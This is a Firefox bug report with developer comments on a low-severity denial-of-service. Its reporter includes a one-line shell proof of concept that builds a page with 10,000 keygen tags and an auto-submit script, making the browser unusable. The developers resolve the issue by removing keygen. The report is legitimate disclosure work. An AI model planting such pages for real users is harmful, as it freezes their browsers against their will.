Many keygen tags can make browser unusable
Categories
(Firefox :: Security, enhancement, P2)
Tracking
()
People
(Reporter: hanno, Assigned: jkt)
References
(Blocks 1 open bug)
Details
(Keywords: csectype-dos, sec-low, Whiteboard: [fixed by bug 1315460][post-critsmash-triage][adv-main69-])
By creating an auto-sending form that contains a large number of keygen tags one can make the browser practically unusable, only recoverable with killing the browser.
Example:
(echo '<form name=f>'; for i in $(seq 1 10000); do echo '<keygen name=a>'; done; echo '</form><script>document.f.submit();</script>') > poc.html
The popup created by keygen is window modal.
It's my understanding that keygen is planned for deprecation anyway, so maybe just accelerate the deprecation?
|
||
Comment 1•6 years ago
|
||
Ah, great, another one. And this one seems pretty bad, too.
Dana, do you know about the state of that keygen dialog? Can we remove it/pref it off? Otherwise we can just try and make it tab modal or rate-limit it.
|
||
Comment 2•6 years ago
|
||
I'm not aware of a pref to turn it off, but I believe :jkt was working on removing it. We should just go ahead with that.
|
|
||
Comment 3•6 years ago
|
||
Seems like removing it is underway, we should close this bug once bug 1315460 lands on central.
|
|
||
Updated•6 years ago
|
|
||
Updated•6 years ago
|
|
||
Updated•6 years ago
|
|
||
Updated•5 years ago
|
|
|
||
Updated•5 years ago
|
|
|
||
Comment 4•5 years ago
|
||
After discussion, we decided that as a DOS, this won't receive a CVE or an advisory (as we generally do neither for DOS issues). Apologies for any confusion.
|
||
Updated•5 years ago
|
Description
•